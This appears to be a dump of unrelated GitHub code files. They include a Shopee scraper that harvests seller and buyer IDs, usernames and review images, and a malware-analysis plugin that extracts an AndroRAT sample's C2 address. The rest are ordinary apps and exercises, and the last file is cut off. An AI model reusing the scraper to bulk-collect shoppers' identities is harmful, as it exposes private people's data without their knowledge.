Shopee:\n def search(self, keyword):\n data = ShopeeSearch.search_keyword(keyword)\n if data != None:\n attributes={'shopid':'賣家ID','shopacc':'賣家帳號','shopname':'賣家名稱', 'itemid':'商品ID', 'name':'商品名稱', 'shop_location':'賣場位置', 'ctime':'上架時間', 'historical_sold':'已售出數量', 'stock':'庫存', 'liked_count':'喜歡數', 'view_count':'瀏覽數', 'price':'實際價格','url':'網址'}\n df = self.data_to_dataframe( data, attributes)\n return df\n else:\n return None\n\n\n def data_to_dataframe( self, data, attributes):\n dict_ = {}\n attributes_key = list(attributes.keys())\n for i in range( 0, len(data), 1):\n item = data[i]\n if '三多' in item['name']:\n for j in range( 0, len(attributes_key), 1):\n key = attributes_key[j]\n key_name = attributes[key]\n if 'shopacc' in key or 'shopname' in key:\n shopid = item['shopid']\n itemid = item['itemid']\n item_name = item['name']\n shop_account, shop_name = ShopeeSearch.search_shopaccount( shopid, itemid, item_name)\n\n if key == 'name':\n str_ = item[key]\n value = emoji.get_emoji_regexp().sub(u'', str_)\n elif key == 'shopacc':\n value = shop_account\n elif key == 'shopname':\n value = shop_name\n elif key == 'ctime':\n date_time = datetime.fromtimestamp(item[key])\n value = date_time.strftime(\"%m/%d/%Y\")\n elif key == 'price_before_discount' and item[key] > 0:\n value = int(item[key]/100000)\n elif key == 'price' and item[key] > 0:\n value = int(item[key]/100000)\n elif key == 'price_min_before_discount' and item[key] > 0:\n value = int(item[key]/100000)\n elif key == 'price_max_before_discount' and item[key] > 0:\n value = int(item[key]/100000)\n elif key == 'url':\n value = 'https://shopee.tw/product/'+str(item['shopid'])+'/'+str(item['itemid'])\n else:\n value = item[key]\n \n if key_name not in dict_:\n dict_[key_name] = []\n dict_[key_name].append(value)\n\n # Create DataFrame\n df = pd.DataFrame(dict_)\n\n\n return df \n\n\n def data_to_dataframe_comment( self, data, attributes):\n # check max image num\n max_imgnum = 0\n for i in range( 0, len(data), 1):\n if data[i]['images'] != None:\n num = len(data[i]['images'])\n max_imgnum = max( num, max_imgnum)\n for i in range( 0, max_imgnum, 1):\n attributes['image'+str(i)] = '圖片'+str(i)\n dict_ = {}\n attributes_key = list(attributes.keys())\n for i in range( 0, len(data), 1):\n item = data[i]\n for j in range( 0, len(attributes_key), 1):\n if data[i]['images'] == None:\n continue\n key = attributes_key[j]\n key_name = attributes[key]\n if key == 'ctime':\n date_time = datetime.fromtimestamp(item[key])\n value = date_time.strftime(\"%m/%d/%Y\")\n elif 'image' in key:\n img_range = len(item['images'])\n img_index = int(key.replace('image',''))\n if img_index >= img_range:\n value = ''\n else:\n value = item['images'][img_index]\n else:\n value = item[key]\n\n if key_name not in dict_:\n dict_[key_name] = []\n dict_[key_name].append(value)\n\n # Create DataFrame\n df = pd.DataFrame(dict_)\n\n return df\n\n\n def data_to_csv( self, csvname, df):\n csvname = Function.check_csvname(csvname)\n df.to_csv('./蝦皮/'+csvname+'.csv', encoding='utf-8-sig', index=False)\n\n\n def show_table( self, gui, df):\n keys = list(df)\n table = gui.tableWidget\n table.setColumnCount(len(keys))\n table.setRowCount(len(df[keys[0]])+1)\n table.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)\n table.setHorizontalHeaderLabels(keys)\n\n df_array = df.values\n for i in range( 0, df.shape[0], 1):\n for j in range( 0, df.shape[1], 1):\n item = QTableWidgetItem(str(df_array[i,j]))\n if keys[j] == '賣家ID' or keys[j] == '商品ID':\n item.setForeground(QBrush(QColor(0,0,255)))\n \n table.setItem( i, j, item)\n\n \n def show_detail( self, gui, index, df):\n keys = list(df)\n column = index.column()\n row = index.row()\n shopid = str(df['賣家ID'][row])\n shopname = str(df['賣家名稱'][row])\n itemid = str(df['商品ID'][row])\n itemname = str(df['商品名稱'][row])\n\n if keys[column] == '賣家ID':\n self.show_shop( gui, shopid, shopname)\n\n elif keys[column] == '商品ID':\n self.show_comment( gui, shopid, shopname, itemid, itemname)\n\n \n def show_shop( self, gui, shopid, shopname):\n data = ShopeeSearch.search_shop(shopid)\n attributes = {'itemid':'商品ID', 'name':'商品名稱', 'shop_location':'賣場位置', 'ctime':'上架時間', 'historical_sold':'已售出數量', 'stock':'庫存', 'liked_count':'喜歡數', 'view_count':'瀏覽數', 'price':'實際價格'}\n df = self.data_to_dataframe( data, attributes)\n \n if df.empty:\n QMessageBox.information(None, '訊息', '此店家過多商品!(功能尚在開發中)')\n else:\n keys = list(df)\n self.data_to_csv( '蝦皮'+'_'+shopname, df)\n\n gui.shop_window = ShopWindow()\n gui.shop_window.show()\n gui.shop_window.label.setText(shopname)\n \n gui.shop_window.tableWidget.setColumnCount(len(keys))\n gui.shop_window.tableWidget.setRowCount(len(df[keys[0]])+1)\n\n gui.shop_window.tableWidget.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)\n gui.shop_window.tableWidget.setHorizontalHeaderLabels(keys)\n\n df_array = df.values\n for i in range( 0, df.shape[0], 1):\n for j in range( 0, df.shape[1], 1):\n item = QTableWidgetItem(str(df_array[i,j]))\n if keys[j] == '商品ID':\n item.setForeground(QBrush(QColor(0,0,255)))\n gui.shop_window.tableWidget.setItem( i, j, item)\n\n gui.shop_window.tableWidget.doubleClicked.connect(lambda:gui.shop_window.index( df, shopid, shopname))\n\n\n def show_comment( self, gui, shopid, shopname, itemid, itemname):\n data = ShopeeSearch.search_comment( shopid, itemid, itemname)\n if data == None:\n QMessageBox.information(None, '訊息', '此商品尚無任何評論!')\n else:\n attributes = {'userid':'買家ID','author_username':'買家名稱','author_shopid':'買家賣場','ctime':'評論時間','rating_star':'評分','comment':'評論'}\n df = self.data_to_dataframe_comment( data, attributes)\n if df.empty:\n QMessageBox.information(None, '訊息', '此商品尚無任何圖片評論!')\n else:\n keys = list(df)\n self.data_to_csv( shopname+'_'+itemname, df)\n\n gui.comment_window = CommentWindow()\n gui.comment_window.show()\n gui.comment_window.label_shopid.setText(shopname)\n gui.comment_window.label_itemname.setText(itemname)\n\n gui.comment_window.tableWidget.setColumnCount(len(keys))\n gui.comment_window.tableWidget.setRowCount(len(df[keys[0]])+1)\n gui.comment_window.tableWidget.setHorizontalHeaderLabels(keys)\n\n\n gui.comment_window.tableWidget.setColumnWidth(0,130)\n gui.comment_window.tableWidget.setColumnWidth(1,120)\n gui.comment_window.tableWidget.setColumnWidth(2,130)\n gui.comment_window.tableWidget.setColumnWidth(3,130)\n gui.comment_window.tableWidget.setColumnWidth(4,50)\n gui.comment_window.tableWidget.setColumnWidth(5,600)\n for i in range( 6, len(keys), 1):\n gui.comment_window.tableWidget.setColumnWidth(i,400)\n \n df_key = list(df)\n df_array = df.values\n for i in range( 0, df.shape[0], 1):\n gui.comment_window.tableWidget.setRowHeight(i, 400)\n for j in range( 0, df.shape[1], 1):\n key_ = df_key[j]\n if '圖片' in key_ and df_array[i,j] != '':\n img_url = 'https://cf.shopee.tw/file/'+df_array[i,j]\n request = requests.get( img_url, stream=True)\n assert request,status_codes == 200\n img_o = QImage()\n assert img_o.loadFromData(request.content)\n img_p = QPixmap.fromImage(img_o)\n img_p = img_p.scaled(350,350)\n w = QLabel()\n w.setPixmap(img_p)\n\n gui.comment_window.tableWidget.setCellWidget( i, j, w)\n else:\n gui.comment_window.tableWidget.setItem( i, j, QTableWidgetItem(str(df_array[i,j])))\n \n gui.comment_window.tableWidget.doubleClicked.connect(lambda:gui.comment_window.index(df))\n \n\n\n def url_search( self, url):\n shopid, itemid, itemname = self.url_parser(url)\n shopaccount, shopname = ShopeeSearch.search_shopaccount(shopid, itemid, itemname)\n self.show_shop( self, shopid, shopname)\n\n def url_parser( self, url):\n # remove query\n url = url.split('?')[0]\n # remove domain\n url = url.replace('https://shopee.tw/','')\n # split url\n itemname, url = url.split('-i.')\n shopid,itemid = url.split('.')\n\n return shopid, itemid, itemname\n\n\nclass ShopWindow( QMainWindow, GUI_Shop.Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n def index( self, df, shopid, shopname):\n #selected cell index\n index = self.tableWidget.selectionModel().currentIndex()\n column = index.column()\n row = index.row()\n\n itemid = str(df['商品ID'][row])\n itemname = str(df['商品名稱'][row])\n self.shopee = Shopee()\n self.shopee.show_comment( self, shopid, shopname, itemid, itemname)\n\n\nclass CommentWindow( QMainWindow, GUI_Comment.Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n def index( self, df): \n #selected cell index\n index = self.tableWidget.selectionModel().currentIndex()\n column = index.column()\n row = index.row()\n df_array = df.values\n img_url = QUrl('https://cf.shopee.tw/file/'+df_array[row,column])\n QDesktopServices.openUrl(img_url)\n\n","repo_name":"andyabc0618/ECCrawler","sub_path":"Shopee/Shopee.py","file_name":"Shopee.py","file_ext":"py","file_size_in_byte":12282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42762426176","text":"import json\nfrom . import APKPlugin\n\n\nclass AndroRAT(APKPlugin):\n name = \"androrat\"\n extraction = \"AndroRAT Configuration\"\n probable_name = \"AndroRAT\"\n\n def run(self, module):\n for cls in self.vm_analysis.get_classes():\n cls = cls.get_vm_class()\n if 'Lmy/app/client/ProcessCommand;'.lower() in cls.get_name().lower():\n self.process_class = cls\n break\n else:\n return None\n\n c2Found = False\n portFound = False\n c2 = \"\"\n port = \"\"\n string = None\n for method in self.process_class.get_methods():\n if method.name == 'loadPreferences':\n for inst in method.get_instructions():\n if inst.get_name() == 'const-string':\n string = inst.get_output().split(',')[-1].strip(\" '\")\n if c2Found:\n c2 = string\n c2Found = False\n if string == 'ip':\n c2Found = True\n if string == 'port':\n portFound = True\n if inst.get_name() == 'const/16':\n if portFound:\n string = inst.get_output().split(',')[-1].strip(\" '\")\n port = string\n if c2 and port:\n break\n\n server = \"\"\n if port:\n server = \"{0}:{1}\".format(c2, str(port))\n else:\n server = c2\n\n module.add_ioc(server, ['androdat', 'c2'])\n\n return json.dumps({'c2': server}, indent=2)\n","repo_name":"certsocietegenerale/fame_modules","sub_path":"processing/apk/apk_plugins/androrat.py","file_name":"androrat.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"71"} +{"seq_id":"23487933363","text":"import socket\nimport threading\n\nimport colorama\nfrom colorama import Fore\n\nfrom lib.client import Client\n\n\nclass Server:\n\n def __init__(self, port, cache):\n self._cache = cache\n self._port = port\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.bind(('0.0.0.0', port))\n self.socket.listen(1)\n\n def start(self):\n colorama.init()\n print(f\"{Fore.CYAN}[*] Started Caching Proxy on port {self._port}\")\n\n while True:\n client_socket, client_address = self.socket.accept()\n client = Client(client_socket, self._cache)\n thread = threading.Thread(target=client.handle_connection)\n thread.start()\n","repo_name":"RobinvandenHurk/cache-proxy","sub_path":"lib/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"} +{"seq_id":"42517751942","text":"import tkinter as tk\nimport os \nimport math\nimport warsawFunc as funct\n\nuser=\"Paige\"\n\nroot = tk.Tk()\nroot.geometry('800x800')\nroot.title(\"Warsaw Wireless\")\nroot['bg']='orange'\n\nframe0 = tk.Frame(root, height=100, width=800, bg=\"orange\", padx=5, pady=5)\nframe0.place(x=0, y=0)\n\nframe1 = tk.Frame(root, height=700, width=800, bg=\"black\", padx=5, pady=5)\nframe1.place(x=0, y=101)\n\n\nlabel0 = tk.Label(text=f\"Hello, {user}\", bg=\"orange\")\nlabel0.place(x=400,y=10)\n\naddSale = tk.Button(root, text=\"Add Sale\", width=15)\naddSale.place(x=200, y=720)\n\nroot.mainloop()","repo_name":"willalley1/PythonWarsawApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"24602171528","text":"\"\"\"\nextract.py is the main file which will be invoked from ADF custom batch activity for extraction process.\n\"\"\"\nfrom os import path\n\n\nimport datetime\nimport argparse\nimport logging\n\nfrom core.extract.extractscheduler import ExtractScheduler\nfrom core.batch.task import Task\nfrom core.batch.job import Job\nfrom core.config import getSettings\nfrom utils.confighelper import ConfigHelper\n\nif __name__ == '__main__':\n\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--inputFile\", \"-i\", help=\"Set the raw path\")\n parser.add_argument(\n \"--outputPath\", \"-o\", help=\"Set the output path\"\n )\n \n args = parser.parse_args()\n\n\n settings = getSettings()\n configHelper=ConfigHelper()\n log = logging.getLogger(__name__)\n task = Task()\n job = Job()\n configHelper = ConfigHelper()\n \n log.info(f\"Environment : {settings.RUN_ENVIRONMENT}\")\n\n start_time = datetime.datetime.now().replace(microsecond=0)\n log.info(f\"Extraction start time: {start_time}\")\n \n #Extract the given bag file\n extractionScheduler = ExtractScheduler(job=job, task=task)\n jobs = extractionScheduler.scheduleExtraction(\n inputFile=args.inputFile,\n outputPath=args.outputPath, \n poolId=settings.AZ_BATCH_EXECUTION_POOL_ID\n )\n\n # Execution will wait for 10 minutes to monitor task execution before terminating gracefully.\n # You can configure it based on your ideal processing time.\n job.monitorJobsToComplete(\n jobs=jobs, timeout=datetime.timedelta(minutes=10)\n )\n\n end_time = datetime.datetime.now().replace(microsecond=0)\n\n log.info(f\"Extraction completion time: {end_time}\")\n elapsed_time = end_time - start_time\n log.info(f\"Elapsed time: {elapsed_time}\")\n\n except Exception as e:\n raise RuntimeError(f\"Error: {e.__class__}\")\n\n","repo_name":"Azure-Samples/modern-data-warehouse-dataops","sub_path":"single_tech_samples/datafactory/sample3_data_pre_processing_with_azure_batch/src/orchestrator-app/app/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":512,"dataset":"github-code","pt":"71"} +{"seq_id":"70694354149","text":"\nfrom siharpa.actions.jaringan.DataPreprocessing import DataPreprocessing\nfrom siharpa.actions.jaringan.Backpropagation import Backpropagation\nfrom datetime import date,timedelta,datetime\nimport pandas as pd\nimport re\nimport io\n\nclass PrediksiImport:\n def __init__(self,arrOfExcel,harga_pangan,hari_prediksi,excel,neuron_input,neuron_hidden,epoh,learn_rate,hidden_layer,normalisasi):\n # print(hari_prediksi)\n # print(excel)\n hari_diprediksi = int(hari_prediksi) # inisialisasi banyak hari diprediksi\n # print('df')\n \n # data = pd.read_excel(excel) #(use \"r\" before the path string to address special character, such as '\\'). Don't forget to put the file name at the end of the path + '.xlsx'\n # df = pd.DataFrame(data)\n # print(df)\n # arrOfExcel = df.values.tolist()\n\n # # data = io.BytesIO(excel.read())\n # # df = pd.read_excel(data,sheet_name='Laporan Harian')\n # # arrOfExcel = df.values.tolist()\n\n # print(arrOfExcel)\n\n # raw_harga_pangan = arrOfExcel[-1][2:]\n\n # if(len(raw_harga_pangan) < 6):\n # raise Exception(\"Data histori terlalu sedikit\")\n \n # print('raw harga pangan ',raw_harga_pangan)\n\n # harga_pangan=[]\n\n # for harga in raw_harga_pangan:\n # print(harga)\n # x = re.findall(\"\\d+\", str(harga))\n # x=''.join(x)\n # harga_pangan.append(int(x))\n \n # print('harga pangan',harga_pangan)\n \n #self.tanggalPangan = self.data.tanggalPangan[int(neuron_input):]\n \n #banyaknya jumlah data input\n data_input = neuron_input\n\n #inisialisasi pembentukan pola data\n pangan = DataPreprocessing(harga_pangan,data_input,normalisasi)\n #normalisasi dengan metode maks-min,desimal,z-score,sigmoid-biner,sigmoid-bipolar, atau tanh\n pangan.normalisasi() #'maks-min','desimal','z-score-biner','z-score-bipolar','z-score-tanh'\n #proses membuat pola dataset\n pangan.polaData();\n #proses pola data agar mendapat pola uji dan latih yang terpisah, dan pola input dan target yang terpisah\n pangan.splitPolaData()\n print(len(pangan.data_normalisasi))\n #Memasuki Model Jaringan Syaraf Tiruan\n \n jst = Backpropagation(epoh,learn_rate,neuron_input,hidden_layer,neuron_hidden,0,pangan,normalisasi)\n\n jst.inisialisasiBobot()\n jst.pelatihan()\n print(hari_diprediksi)\n jst.prediksi(hari_diprediksi)\n jst.data.transformNormalisasi()\n \n #Buat Array Harga Pangan\n self.hargaPangan = []\n self.tanggalPangan=[]\n self.hargaPangan.extend(jst.data.transform_target_latih.tolist())\n #self.hargaPangan.extend(harga_pangan[-hari_diprediksi:])\n print(arrOfExcel[0][2+int(neuron_input):])\n \n try:\n for tanggal in arrOfExcel[-3][2+int(neuron_input):]:\n print('old tanggal')\n print(tanggal)\n new_tanggal = re.sub('/+','-',tanggal)\n print(new_tanggal)\n self.tanggalPangan.append(new_tanggal)\n except :\n for tanggal in arrOfExcel[-2][2+int(neuron_input):]:\n print('old tanggal')\n print(tanggal)\n new_tanggal = re.sub('/+','-',tanggal)\n print(new_tanggal)\n self.tanggalPangan.append(new_tanggal)\n \n today = datetime.strptime(self.tanggalPangan[-1],'%d-%m-%Y')\n for index_hari_diprediksi in range(hari_diprediksi):\n #self.tanggalPangan.append(date(today.year,today.month,today.day+index_hari_diprediksi+1).strftime('%d/%m/%Y'))\n self.tanggalPangan.append((today+timedelta(days=index_hari_diprediksi+1)).strftime('%d-%m-%Y'))\n \n print('tanggal pangan',self.tanggalPangan)\n print(jst.data.transform_output_latih.tolist())\n print(jst.data.transform_prediksi.tolist())\n \n #Buat Array Prediksi\n self.hargaPrediksi = []\n self.hargaPrediksi.extend(jst.data.transform_output_latih.tolist())\n self.hargaPrediksi.extend(jst.data.transform_prediksi.tolist())\n self.akurasi = 100 - jst.meanAbsolutePrecentageError(self.hargaPangan,self.hargaPrediksi)\n","repo_name":"AxlAdilla/siharpa","sub_path":"siharpa/actions/PrediksiImport.py","file_name":"PrediksiImport.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15739105730","text":"\"\"\"This file emulates a constant stream of requests.\"\"\"\n\nimport json\nimport os\nimport random\nimport time\nfrom typing import Optional\n\nfrom locust import HttpUser, constant, task\n\nPROMPTS = [\n \"When was George Washington president?\",\n \"Explain to me the difference between nuclear fission and fusion.\",\n \"Give me a list of 5 science fiction books I should read next.\",\n \"Explain the difference between Spark and Ray.\",\n \"Suggest some fun holiday ideas.\",\n \"Tell a joke.\",\n \"What is 2+2?\",\n \"Explain what is machine learning like I am five years old.\",\n \"Explain what is artifical intelligence.\",\n \"How do I make fried rice?\",\n \"What are the most influential punk bands of all time?\",\n \"What are the best places in the world to visit?\",\n \"Which Olympics were held in Australia? What years and what cities?\",\n]\n\nMODELS = [\n # \"amazon/LightGPT\",\n # \"OpenAssistant/falcon-7b-sft-top1-696\",\n \"OpenAssistant/falcon-40b-sft-top1-560\",\n # \"RWKV/rwkv-raven-14b\",\n]\n\nBACKEND_TOKEN = os.getenv(\"AVIARY_TOKEN\", \"\")\n\n\nclass User(HttpUser):\n wait_time = constant(0)\n\n def query(self, max_iterations: Optional[int] = None):\n prompt = random.choice(PROMPTS)\n model = random.choice(MODELS)\n model = model.replace(\"/\", \"--\")\n with self.client.post(\n f\"/stream/{model}\",\n json={\n \"prompt\": prompt,\n \"parameters\": {\"max_new_tokens\": 512},\n },\n headers={\"Authorization\": f\"Bearer {BACKEND_TOKEN}\"},\n timeout=120,\n catch_response=True,\n stream=True,\n ) as response:\n try:\n if response.status_code != 200:\n raise RuntimeError(\n f\"Got non-200 response code: {response.status_code}.\"\n )\n else:\n chunks = []\n iteration = 0\n time_since_last_chunk = time.monotonic()\n for chunk in response.iter_lines(\n chunk_size=None, decode_unicode=True\n ):\n iteration += 1\n if iteration == max_iterations:\n # Disconnect request\n break\n chunk = chunk.strip()\n if chunk:\n if time.monotonic() - time_since_last_chunk > 120:\n raise RuntimeError(\n \"* Chunk timeout.\" f\"\\n* Chunks so far: {chunks}\"\n )\n time_since_last_chunk = time.monotonic()\n chunks.append(chunk)\n data = json.loads(chunk)\n if data.get(\"error\"):\n raise RuntimeError(\n f\"* Data chunk contained an error: {data}\"\n f\"\\n* Chunks so far: {chunks}\"\n )\n except Exception as e:\n response.failure(f\"Exception: {e}\")\n response.success()\n return response\n\n @task(10)\n def query_and_consume(self):\n \"\"\"Emulates a user that consumes an entire request.\"\"\"\n self.query(max_iterations=None)\n\n @task(1)\n def query_and_skip(self):\n \"\"\"Emulates a disconnect while the response is streaming.\"\"\"\n self.query(max_iterations=2) # Disconnect after two iterations\n","repo_name":"morhidi/ray-llm","sub_path":"loadtest/canceling.py","file_name":"canceling.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"32475454606","text":"#Sorting\r\n\r\n\"\"\"\r\nGiven an array, a, of size n distinct elements, sort the array in ascending order using the Bubble Sort algorithm above. \r\nOnce sorted, print the following 3 lines:\r\n\r\n>>Array is sorted in numSwaps swaps, where numSwaps is the number of swaps that took place.\r\n>>First Element: firstElement, where firstElement is the first element in the sorted array.\r\n>>Last Element: lastElement, where lastElement is the last element in the sorted array.\r\n\r\nSample Input::\r\n3\r\n1 2 3\r\n\r\nSample Output::\r\nArray is sorted in 0 swaps.\r\nFirst Element: 1\r\nLast Element: 3\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport sys\r\n\r\nn = int(input().strip())\r\na = list(map(int, input().strip().split(' ')))\r\n\r\nnumSwaps=0\r\n\r\nfor i in range(n):\r\n\tfor j in range(n-1):\r\n\t\tif a[j]>a[j+1]:\r\n\t\t\ttemp=a[j]\r\n\t\t\ta[j]=a[j+1]\r\n\t\t\ta[j+1]=temp\r\n\t\t\tnumSwaps+=1\r\n\r\nprint('Array is sorted in',numSwaps,'swaps.')\r\nprint('First Element:',a[0])\r\nprint('Last Element:',a[-1])\r\n\r\n","repo_name":"SushantBabu97/HackerRank_30Days_Python_Challenge-","sub_path":"Day20.py","file_name":"Day20.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"70038548071","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\n\n\n'''We can display the text in different ways. Streamlit allows you to write the title, header, and also supports various functions.\n\nst.title()- to set the title\nst.text() to write the description for the particular graph\nst.markdown() to display text as markdown\nst.latex() to display the mathematical expressions in the dashboard.\nst.write() helps to display everything such as plotly graph, dataframe, functions, model, etc.\nst.sidebar() is used for displaying data on the sidebar.\nst.dataframe() to display the data frame\nst.map() to display the map in just a single line code etc'''\n\n\nst.title(\"Covid_19 Dashboard For India\")\nst.markdown(\"The dashboard will visualize the Covid_19 Situation in India\")\nst.markdown(\"Coronavirus disease (COVID_19) is an infectious disease caused by a newly discovered coronavirus. Most people infected with the COVID-19 virus will experience mild to moderate respiratory illness and recover without requiring special treatment.’. This app gives you the real-time impact analysis of Confirmed, Deaths, active, and recovered cases of COVID-19 \")\nst.sidebar.title(\"Visualization Selector\")\nst.sidebar.markdown(\"Select the Charts/Plots accordingly:\")\n \n\n\n\n\ndef load_data():\n data=pd.read_csv(\"covid_data.csv\")\n return data\n\ncovid19_data=load_data()\n\n\nst.sidebar.checkbox(\"Show Analysis by State\", True, key=1)\nselect = st.sidebar.selectbox('Select a State',covid19_data['continent'])\n\n#get the state selected in the selectbox\nstate_data = covid19_data[covid19_data['continent'] == select]\nselect_status = st.sidebar.radio(\"Covid-19 patient's status\", ('Confirmed',\n'Active', 'Recovered', 'Deceased'))\n\n\n\ndef get_total_dataframe(dataset):\n total_dataframe = pd.DataFrame({\n 'Status':['Confirmed', 'Recovered', 'Deaths','Active'],\n 'Number of cases':(dataset.iloc[0]['confirmed'],\n dataset.iloc[0]['recovered'], \n dataset.iloc[0]['deaths'],dataset.iloc[0]['active'])})\n return total_dataframe\n\nstate_total = get_total_dataframe(state_data)\n\nif st.sidebar.checkbox(\"Show Analysis by State\", True, key=2):\n st.markdown(\"## **State level analysis**\")\n st.markdown(\"### Overall Confirmed, Active, Recovered and \" +\n \"Deceased cases in %s yet\" % (select))\n if not st.checkbox('Hide Graph', False, key=1):\n state_total_graph = px.bar(\n state_total, \n x='Status',\n y='Number of cases',\n labels={'Number of cases':'Number of cases in %s' % (select)},\n color='Status')\n st.plotly_chart(state_total_graph)","repo_name":"anmol2806/Streamlit_practice","sub_path":"streamlit/st3.py","file_name":"st3.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8991421138","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('courses', '0003_auto_20170509_0036'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='course',\n name='about',\n field=models.TextField(verbose_name='Sobre o Curso', blank=True, default=1),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='course',\n name='description',\n field=models.TextField(verbose_name='Descrição Simples', blank=True),\n ),\n migrations.AlterField(\n model_name='course',\n name='start_date',\n field=models.DateField(verbose_name='Data de Inicio', null=True, blank=True),\n ),\n ]\n","repo_name":"MarcusWiilo/Django-Aplications","sub_path":"pro_final/pro_final/courses/migrations/0004_auto_20170509_1940.py","file_name":"0004_auto_20170509_1940.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"29356878519","text":"import tkinter as tk\nimport numpy as np\nfrom tkinter import filedialog as fd\n\nwin = tk.Tk()\n\n\nWIDTH = 500\nHEIGHT = 500\nvs = 10\nabs = vs\n#cells = []\ncells = np.zeros((WIDTH//vs, HEIGHT//vs), dtype = int) #dvojrozmerný zoznam\ncells_new = np.zeros((WIDTH//vs, HEIGHT//vs), dtype = int)\nprint(cells)\n\ndef getne(x,y):\n total = 0\n if x > 0:\n total += cells[x-1, y]\n if x > 0 and y > 0:\n total += cells[x-1, y-1]\n if y > 0:\n total += cells[x, y-1]\n if x < (WIDTH//abs-1) and y < (HEIGHT//abs-1):\n total += cells[x+1, y+1]\n if x > 0 and y < (HEIGHT//abs-1):\n total += cells[x-1, y+1]\n if y < (HEIGHT//abs-1):\n total += cells[x, y+1]\n if x < (WIDTH//abs-1):\n total += cells[x+1, y]\n if y > 0 and x < (WIDTH//abs-1):\n total += cells[x+1, y-1]\n return total\n\n\ndef recalculate(): # počítame počet susedných buniek\n global cells, cells_new\n #prepočet - v dvoch cykloch chodím po bunkách a pýtam sa koľko majú susedov\n for y in range(HEIGHT//abs):\n for x in range(WIDTH//abs):\n temp = getne(x,y)\n if temp == 2 and cells[x,y] == 1:\n cells_new[x,y] = 1\n if temp == 3:\n cells_new[x,y] = 1\n if temp < 2 or temp > 3:\n cells_new[x,y] = 0\n cells = cells_new.copy()\n canvas.delete(\"all\")\n create_stage()\n redraw_cells()\n\ndef slider_changed(e):\n global vs\n print(slider.get())\n canvas.delete(\"all\") #vymaž canvas - vymaže všetko čo je na canvase\n vs = slider.get() #zoberie hodnotu slidera a dá ho do premennej vs\n create_stage() #vykresli mriežku\n redraw_cells()\n\n\ndef create_cells(e):\n global cells\n tx = e.x//vs\n ty = e.y//vs\n x = (tx)*vs\n y = (ty)*vs\n #cells.append(canvas.create_oval(x+5,y+5,x+vs-5,y+vs-5,fill=\"yellow\")) #máme idečka v cells\n canvas.create_rectangle(x,y,x+vs,y+vs,fill=\"yellow\")\n cells[tx,ty]=1\n print(getne(tx,ty))\n #print(cells)\n\ndef redraw_cells():\n # prechádzame cell a ak tam je 1 vykreslia bunku na prislušnom mieste a rozmeroch\n for x in range(WIDTH//vs):\n for y in range(HEIGHT//vs):\n if cells[x,y] == 1:\n canvas.create_rectangle(x*vs,y*vs,(x+1)*vs,(y+1)*vs, fill = \"yellow\")\n\ndef create_stage():\n for x in range(WIDTH//vs):\n canvas.create_line(x*vs,0,x*vs,HEIGHT)\n for y in range(HEIGHT//vs):\n canvas.create_line(0,y*vs,WIDTH,y*vs)\n\ndef open_file():\n #ak je tam jedna hod ju do cells a vykresli cells\n global cells, cells_new\n zoz = []\n poc = 0\n filename = fd.askopenfilename()\n f = open(filename,\"r\")\n for i in f:\n for j in i.split():\n zoz.append(j)\n for m in zoz:\n for n in m:\n poc += 1\n if poc < 2500: # 50*50\n for o in range(len(zoz)): #cyklus sa zopakuje toľkokrát, koľko je dlžka zoznamu\n for p in range(len(zoz[p])):\n print(zoz[o][p])\n if zoz[o][p] == \"1\": #ak zoznam na tom mieste sa rovná 1 tak aj bunka sa budú rovnať 1 (vytvorí sa)\n cells_new[o, p] = 1\n else:\n cells_new[o, p] = 0\n cells = cells_new.copy()\n canvas.delete(\"all\")\n create_stage()\n redraw_cell()\n else:\n print(\"Tvoj súbor je príliš veľký\")\n\ndef opakovanie():\n if button2.config(\"text\")[-1] == \"STOP\": #ak je tlačidlo na tejto pozícii tak sa spustí recalculate\n recalculate()\n win.after(500, opakovanie) # potom sa 500 milisekúnd obnocí canvas\n #print(button2.config(\"text\")[-1])\n\ndef change():\n if button2.config(\"text\")[-1] == \"ŠTART\": #ak je tlačidlo na tejto pozícii tak po ďalšom kliknutí sa zmení\n button2.config(text = \"STOP\")\n opakovanie() # a znovu sa spustí funkcia opakovanie\n else:\n button2.config(text = \"ŠTART\")\n\ncanvas = tk.Canvas(width=WIDTH, height=HEIGHT, bg=\"white\")\ncanvas.pack()\n\nslider = tk.Scale(win, 